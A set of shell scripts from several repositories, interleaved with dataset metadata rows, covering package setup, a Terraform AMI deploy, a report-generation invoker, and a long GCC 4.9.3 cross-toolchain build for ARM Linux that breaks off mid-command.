if [[ `whoami` != "root" ]]; then
SUDO=sudo
fi
# Install utilities
$SUDO apt-get update
$SUDO apt-get install -y git build-essential
| true
|
c4f22808c872d7fc9eeec3eefe8b36710c014f1a
|
Shell
|
WorkloadAutomation/WADemo
|
/setup.sh
|
UTF-8
| 437
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
#############################################################################
# Licensed Materials - Property of HCL*
# (C) Copyright HCL Technologies Ltd. 2017, 2018 All rights reserved.
# * Trademark of HCL Technologies Limited
#############################################################################
export basedir=`dirname $0`
components="common docker agents"
for c in $components; do
$basedir/${c}/setup.sh
done
| true
|
54ff337d442393cb765dccf806bc140d3f1ee211
|
Shell
|
webclinic017/gotolong
|
/gotolong/corpact/corpact_invoke.sh
|
UTF-8
| 941
| 2.78125
| 3
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
if test -n "${GOTOLONG_LOGGING_LEVEL}"
then
LOGGING_LEVEL=${GOTOLONG_LOGGING_LEVEL}
else
LOGGING_LEVEL=INFO
fi
CONFIG_GLOBAL_DATA_LOC=`python -m gotolong.config.config_ini global_data`
CONFIG_GLOBAL_REPORTS_LOC=`python -m gotolong.config.config_ini global_reports`
CONFIG_PROFILE_DATA_LOC=`python -m gotolong.config.config_ini profile_data`
CONFIG_PROFILE_REPORTS_LOC=`python -m gotolong.config.config_ini profile_reports`
# figure this out automatically
IN_FILE_1=$CONFIG_GLOBAL_REPORTS_LOC/bse-reports/all/bse-all-corpact.csv
OUT_FILE_1=$CONFIG_GLOBAL_REPORTS_LOC/corpact-reports/corpact-reports-phase-1.csv
OUT_FILE_2=$CONFIG_GLOBAL_REPORTS_LOC/corpact-reports/corpact-reports-phase-1.txt
# python amfi_invoke.py --debug_level ${DEBUG_LEVEL} --in_files ${IN_FILE} --out_files ${OUT_FILE_1}
python corpact.py -t -l ${LOGGING_LEVEL} -i ${IN_FILE_1} -o ${OUT_FILE_1} ${OUT_FILE_2}
# csv2html -o test.html test/test.csv
| true
|
979045a577fb2fbcf34e0cc8a17e946e505da0c5
|
Shell
|
faulke/weather-infra
|
/terraform/prod/deploy.sh
|
UTF-8
| 620
| 3.34375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
echo $1
# initialize ami id variable
AMI="None"
# try getting AMI id until it is available
until [ $AMI != "None" ]; do
echo "Fetching AMI."
AMI="$(aws ec2 describe-images --filters Name=tag:Version,Values=$1 --query Images[0].[ImageId] --output text)"
done
echo $AMI
# get modules
terraform get
# get tfstate from s3 backend
terraform init
# validate plan
terraform plan -var ami=$AMI -var access_key=$AWS_ACCESS_KEY_ID -var secret_key=$AWS_SECRET_ACCESS_KEY
# apply plan -- deploy
terraform apply -var ami=$AMI -var access_key=$AWS_ACCESS_KEY_ID -var secret_key=$AWS_SECRET_ACCESS_KEY
| true
|
f597402d3e1f0a1625e7c79afae7c465d6ea9802
|
Shell
|
jief666/GccBuild
|
/BuildScripts/Build-gcc-493-osx_cross_arm-linux-30228
|
UTF-8
| 26,024
| 3.6875
| 4
|
[] |
no_license
|
#!/bin/bash
# Do not define var in this script. Define tham all in SetupEnv-$BUILDGCC_SUFFIX.
# The goal is to be able to copy and paste command from this script to a console. Helped me a lot when debugging step by step
if [ -z "$BUILDGCC_BUILD_DIR" ]
then
echo BUILDGCC_BUILD_DIR not defined
exit 1
fi
#[ -z "$BUILDGCC_SYSTEM_HEADER_DIR" -a -d "/JiefLand/5.Devel" ] && export BUILDGCC_SYSTEM_HEADER_DIR=/JiefLand/5.Devel/Syno/DSM6.0/ds.armada370-6.0.dev/usr/local/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sysroot/usr/include
#[ -z "$BUILDGCC_SYSTEM_HEADER_DIR" -a -d "/Volumes/5.Devel" ] && export BUILDGCC_SYSTEM_HEADER_DIR=/Volumes/5.Devel/Syno/DSM6.0/ds.armada370-6.0.dev/usr/local/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sysroot/usr/include
#if [ -z "$BUILDGCC_SYSTEM_HEADER_DIR" ]
#then
# echo Please define BUILDGCC_SYSTEM_HEADER_DIR to the path of target system includes.
# exit 1
#fi
# ulimit maybe not needed.
ulimit -n 1024
set -u -o pipefail
#If every component are already sucessfully built, "$BUILDGCC_BUILD_DIR"/make_sucessfully.done will be recreated immediately.
[ -f "$BUILDGCC_BUILD_DIR"/make_sucessfully.done ] && rm "$BUILDGCC_BUILD_DIR"/make_sucessfully.done
mkdir -p "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM
mkdir -p "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/usr
# on Lion, we must specify destination name ('include') even if it's the same
[[ ! -L "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/usr/include ]] && ln -s ../include/ "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/usr/include
mkdir -p "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/include
"$BUILDGCC_BUILDSCRIPTS"/Extract "include_linux-dsm6.0" $TARGET_PLATFORM/include linux || exit 1
"$BUILDGCC_BUILDSCRIPTS"/Extract "include_asm-dsm6.0" $TARGET_PLATFORM/include asm || exit 1
"$BUILDGCC_BUILDSCRIPTS"/Extract "include_asm-generic-dsm6.0" $TARGET_PLATFORM/include asm-generic || exit 1
echo *-*-*-*------------------------------------------------------------------ GMP ------------------------------------------------------------------------
if [ ! -f "$BUILDGCC_BUILD_DIR"/$GMP_SOURCES_DIR-build/make_sucessfully.done ]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$GMP_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$GMP_SOURCES_DIR-build
mkdir "$BUILDGCC_BUILD_DIR"/$GMP_SOURCES_DIR-build
cd "$BUILDGCC_BUILD_DIR"/$GMP_SOURCES_DIR-build
#--disable-assembly <- needed for isl
#had to put flags in CC (instead of CFLAGS) variable so they are used when configure do the "check how to run preprocessor"
../$GMP_SOURCES_DIR/configure CPPFLAGS="-fexceptions" \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--enable-cxx \
--disable-shared \
--disable-assembly \
--with-pic \
2>&1 | tee configure-stdout.log
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
#[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS check 2>&1 | tee make-check-stdout.log
[[ $? == 0 ]] && make install 2>&1 | tee make-install-stdout.log
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$GMP_SOURCES_DIR-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ GMP failed ------------------------------------------------------------------------
exit 1
fi
echo *-*-*-*------------------------------------------------------------------ MPFR ------------------------------------------------------------------------
if [[ -f "$BUILDGCC_BUILD_DIR"/$GMP_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$MPFR_SOURCES_DIR-build/make_sucessfully.done ]]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$MPFR_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$MPFR_SOURCES_DIR-build
mkdir "$BUILDGCC_BUILD_DIR"/$MPFR_SOURCES_DIR-build
cd "$BUILDGCC_BUILD_DIR"/$MPFR_SOURCES_DIR-build
../$MPFR_SOURCES_DIR/configure \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-gmp="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--disable-shared \
2>&1 | tee configure-stdout.log
# --enable-shared \ <- error illegal text-relocation to '___gmp_binvert_limb_table'
#--disable-assembly \ <- not recognized
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
#[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS check 2>&1 | tee make-check-stdout.log
[[ $? == 0 ]] && make install 2>&1 | tee make-install-stdout.log
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$MPFR_SOURCES_DIR-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ MPFR failed ------------------------------------------------------------------------
exit 1
fi
echo *-*-*-*------------------------------------------------------------------ MPC ------------------------------------------------------------------------
if [[ -f "$BUILDGCC_BUILD_DIR"/$MPFR_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$MPC_SOURCES_DIR-build/make_sucessfully.done ]]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$MPC_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$MPC_SOURCES_DIR-build
mkdir "$BUILDGCC_BUILD_DIR"/$MPC_SOURCES_DIR-build
cd "$BUILDGCC_BUILD_DIR"/$MPC_SOURCES_DIR-build
../$MPC_SOURCES_DIR/configure \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--disable-shared \
--with-gmp="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-mpfr="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
2>&1 | tee configure-stdout.log
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
#[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS check 2>&1 | tee make-check-stdout.log
[[ $? == 0 ]] && make install 2>&1 | tee make-install-stdout.log
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$MPC_SOURCES_DIR-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ MPC failed ------------------------------------------------------------------------
exit 1
fi
if [ ! -z "${ELF_SOURCES_DIR-}" ]
then
echo *-*-*-*------------------------------------------------------------------ ELF ------------------------------------------------------------------------
if [[ ! -f "$BUILDGCC_BUILD_DIR"/$ELF_SOURCES_DIR-build/make_sucessfully.done ]]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$ELF_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$ELF_SOURCES_DIR-build
mkdir "$BUILDGCC_BUILD_DIR"/$ELF_SOURCES_DIR-build
cd "$BUILDGCC_BUILD_DIR"/$ELF_SOURCES_DIR-build
../$ELF_SOURCES_DIR/configure \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
2>&1 | tee configure-stdout.log
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
#[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS check 2>&1 | tee make-check-stdout.log
[[ $? == 0 ]] && make install 2>&1 | tee make-install-stdout.log
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$ELF_SOURCES_DIR-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ ELF failed------------------------------------------------------------------------
exit 1
fi
fi
echo *-*-*-*------------------------------------------------------------------ ISL ------------------------------------------------------------------------
if [[ -f "$BUILDGCC_BUILD_DIR"/$MPC_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$ISL_SOURCES_DIR-build/make_sucessfully.done ]]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$ISL_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$ISL_SOURCES_DIR-build
mkdir "$BUILDGCC_BUILD_DIR"/$ISL_SOURCES_DIR-build
cd "$BUILDGCC_BUILD_DIR"/$ISL_SOURCES_DIR-build
../$ISL_SOURCES_DIR/configure \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-gmp-prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-pic=PIC \
2>&1 | tee configure-stdout.log
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
#[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS check 2>&1 | tee make-check-stdout.log
[[ $? == 0 ]] && make install 2>&1 | tee make-install-stdout.log
[[ $? == 0 ]] && mkdir -p "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/dylib
[[ $? == 0 ]] && cp -a "$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM/lib/libisl* "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/dylib
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$ISL_SOURCES_DIR-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ ISL failed------------------------------------------------------------------------
exit 1
fi
echo *-*-*-*------------------------------------------------------------------ Cloog ------------------------------------------------------------------------
if [[ -f "$BUILDGCC_BUILD_DIR"/$ISL_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$CLOOG_SOURCES_DIR-build/make_sucessfully.done ]]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$CLOOG_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$CLOOG_SOURCES_DIR-build
mkdir "$BUILDGCC_BUILD_DIR"/$CLOOG_SOURCES_DIR-build
cd "$BUILDGCC_BUILD_DIR"/$CLOOG_SOURCES_DIR-build
../$CLOOG_SOURCES_DIR/configure \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--disable-shared \
--with-gmp-prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-isl-prefix="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
2>&1 | tee configure-stdout.log
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
#[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS check 2>&1 | tee make-check-stdout.log
[[ $? == 0 ]] && make install 2>&1 | tee make-install-stdout.log
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$CLOOG_SOURCES_DIR-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ Cloog failed------------------------------------------------------------------------
exit 1
fi
echo *-*-*-*------------------------------------------------------------------ BINUTILS ------------------------------------------------------------------------
if [[ -f "$BUILDGCC_BUILD_DIR"/$CLOOG_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$BINUTILS_SOURCES_DIR-build/make_sucessfully.done ]]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$BINUTILS_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$BINUTILS_SOURCES_DIR-build
mkdir "$BUILDGCC_BUILD_DIR"/$BINUTILS_SOURCES_DIR-build
cd "$BUILDGCC_BUILD_DIR"/$BINUTILS_SOURCES_DIR-build
../$BINUTILS_SOURCES_DIR/configure \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--disable-werror \
--prefix="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
--target=$TARGET_PLATFORM \
--with-sysroot \
--disable-multilib \
--enable-poison-system-directories \
2>&1 | tee configure-stdout.log
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
[[ $? == 0 ]] && make install 2>&1 | tee make-install-stdout.log
if [[ $? == 0 ]]
then
echo "update_all_lib_path"
update_all_lib_path "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$BINUTILS_SOURCES_DIR-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ BINUTILS failed------------------------------------------------------------------------
exit 1
fi
echo *-*-*-*------------------------------------------------------------------ GCC cross1 ------------------------------------------------------------------------
if [[ -f "$BUILDGCC_BUILD_DIR"/$BINUTILS_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross1-build/make_sucessfully.done ]]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$GCC_SOURCES_DIR" || exit 1
#to avoid : checking for shl_load... configure: error: Link tests are not allowed after GCC_NO_EXECUTABLES.
#./$GCC_SOURCES_DIR/libtool.m4
# delete line 5279 (LT_SYS_DLOPEN_SELF)
#./$GCC_SOURCES_DIR/gcc/cp/Make-lang.in
# line 73 :
# CXX_C_OBJS = attribs.o c-common.o c-format.o c-pragma.o c-semantics.o c-lex.o \
# c-dump.o $(CXX_TARGET_OBJS) c-pretty-print.o c-opts.o c-pch.o \
# incpath.o cppdefault.o c-ppoutput.o c-cppbuiltin.o prefix.o \
# c-gimplify.o c-omp.o tree-inline.o
# -> remove cppdefault.o & tree-inline.o
rm -rf "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross1-build
mkdir "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross1-build
cd "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross1-build
#--disable-threads -> to enable thread, pthread.h is needed.
# --with-sysroot="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
../$GCC_SOURCES_DIR/configure \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--target=$TARGET_PLATFORM \
--prefix="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
--enable-languages=c \
--enable-werror=no \
--with-arch=armv7-a \
--with-float=hard \
--disable-threads \
--disable-multilib \
--disable-libmudflap \
--disable-libssp \
--disable-libatomic \
--disable-libitm \
--disable-libquadmath \
--disable-libsanitizer \
--disable-libvtv \
--disable-libcilkrts \
--disable-libstdcxx \
--disable-libstdcxx-pch \
--disable-libgomp \
--disable-shared \
--disable-lto \
--disable-nls \
--without-ppl \
--enable-poison-system-directories \
--with-gmp="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-mpfr="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-mpc="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-isl="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-cloog="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--without-headers \
2>&1 | tee configure-stdout.log
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS all-gcc 2>&1 | tee make-all-gcc-stdout.log
[[ $? == 0 ]] && make install-gcc 2>&1 | tee make-install-gcc-stdout.log
[[ $? == 0 ]] && make $BUILDGCC_MAKEJOBS all-target-libgcc 2>&1 | tee make-all-target-libgcc-stdout.log
[[ $? == 0 ]] && make install-target-libgcc 2>&1 | tee make-install-target-libgcc-stdout.log # this install crtbegin.o etc.
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross1-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ GCC cross 1 failed------------------------------------------------------------------------
exit 1
fi
echo *-*-*-*------------------------------------------------------------------ GLIBC Headers ------------------------------------------------------------------------
if [[ -f "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross1-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-headers-build/make_sucessfully.done ]]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$GLIBC_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-headers-build
mkdir "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-headers-build
cd "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-headers-build
cp -n "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/scripts/sysd-rules.awk "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/scripts/sysd-rules.orig
patch -o "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/scripts/sysd-rules.awk "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/scripts/sysd-rules.orig <<"END_OF_PATCH"
--- scripts/sysd-rules.awk
+++ scripts/sysd-rules.awk.new
@@ -53,7 +53,7 @@ BEGIN {
if (target_pattern == "%") {
command_suffix = "";
} else {
- prefix = gensub(/%/, "", "", target_pattern);
+ prefix = gensub(/%/, "", 1, target_pattern);
command_suffix = " $(" prefix "CPPFLAGS)";
}
target = "$(objpfx)" target_pattern o ":";
END_OF_PATCH
#cp -n "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/Makefile "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/Makefile.orig
#sed '167s|$(BUILD_CC) $^ $(BUILD_LDFLAGS) -o $@|$(BUILD_CC) $^ $(BUILD_LDFLAGS) -lintl -o $@|' "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/Makefile.orig \
# | sed '167s/-lintl//' \
# >"$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/Makefile
cp -n "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_main.c "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_main.c.orig
sed '41s|^#include <libintl.h>|//#include <libintl.h>|' "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_main.c.orig \
| sed '56s|^|#define _(str) str|' \
| sed '177s|^ setlocale|// setlocale|' \
| sed '178s|^ textdomain|// textdomain|' \
>"$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_main.c
#cp -n "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_scan.c "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_scan.c.orig
#sed '40s|#include <libintl.h>|//#include <libintl.h>|' "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_scan.c.orig \
# >"$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_scan.c
../$GLIBC_SOURCES_DIR/configure \
BUILD_CC="gcc -I$BUILDGCC_TOOLS_DIR/AppleDevTools/include" \
CC="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-gcc \
CXX="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-g++ \
AR="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-ar \
RANLIB="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-ranlib \
READELF="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-readelf \
--prefix="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
--host=$TARGET_PLATFORM \
--exec-prefix="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
--with-binutils="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM/bin \
--with-headers="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/usr/include \
--enable-add-ons \
--disable-shared \
libc_cv_ssp=yes \
libc_cv_predef_stack_protector=no \
libc_cv_z_relro=yes \
libc_cv_forced_unwind=yes \
libc_cv_c_cleanup=yes \
2>&1 | tee configure-stdout.log
if [[ -f config.status ]]; then
mkdir -p "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/include/gnu
touch "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/include/gnu/stubs.h
[[ $? == 0 ]] && make install-headers 2>&1 | tee make-install-headers-stdout.log
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-headers-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ GLIBC Headers failed------------------------------------------------------------------------
exit 1
fi
echo *-*-*-*------------------------------------------------------------------ GLIBC ------------------------------------------------------------------------
if [[ -f "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-headers-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-build/make_sucessfully.done ]]; then
"$BUILDGCC_BUILDSCRIPTS"/Extract "$GLIBC_SOURCES_DIR" || exit 1
rm -rf "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-build
mkdir "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-build
cd "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-build
#cp -n "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_main.c.orig "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_main.c
#cp -n "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_scan.c.orig "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_scan.c
# install_root="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORMTmp \
# BUILD_CC="gcc -I$BUILDGCC_TOOLS_DIR/AppleDevTools/include" \
../$GLIBC_SOURCES_DIR/configure \
BUILD_CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CC="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-gcc \
CXX="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-g++ \
AR="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-ar \
RANLIB="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-ranlib \
READELF="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-readelf \
--prefix= \
--build=$(../$GLIBC_SOURCES_DIR/scripts/config.guess) \
--host=$TARGET_PLATFORM \
--with-headers="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/usr/include \
--with-binutils="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin \
--disable-multilib \
--enable-add-ons \
--enable-shared \
libc_cv_forced_unwind=yes \
libc_cv_c_cleanup=yes \
libc_cv_predef_stack_protector=yes \
2>&1 | tee configure-stdout.log
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
[[ $? == 0 ]] && make install_root="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM install 2>&1 | tee make-install-stdout.log
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ GLIBC failed------------------------------------------------------------------------
exit 1
fi
echo *-*-*-*------------------------------------------------------------------ GCC cross 2 ------------------------------------------------------------------------
if [[ -f "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross2-build/make_sucessfully.done ]]; then
#Source must have been extracted and pacthed in GCC cross 1 step
cp -n "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc.orig
sed "739s|unsigned IOCTL_SCSI_IOCTL_TAGGED_DISABLE = SCSI_IOCTL_TAGGED_DISABLE|//unsigned IOCTL_SCSI_IOCTL_TAGGED_DISABLE = SCSI_IOCTL_TAGGED_DISABLE|" "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc.orig \
| sed "740s|unsigned IOCTL_SCSI_IOCTL_TAGGED_ENABLE = SCSI_IOCTL_TAGGED_ENABLE|//unsigned IOCTL_SCSI_IOCTL_TAGGED_ENABLE = SCSI_IOCTL_TAGGED_ENABLE|" \
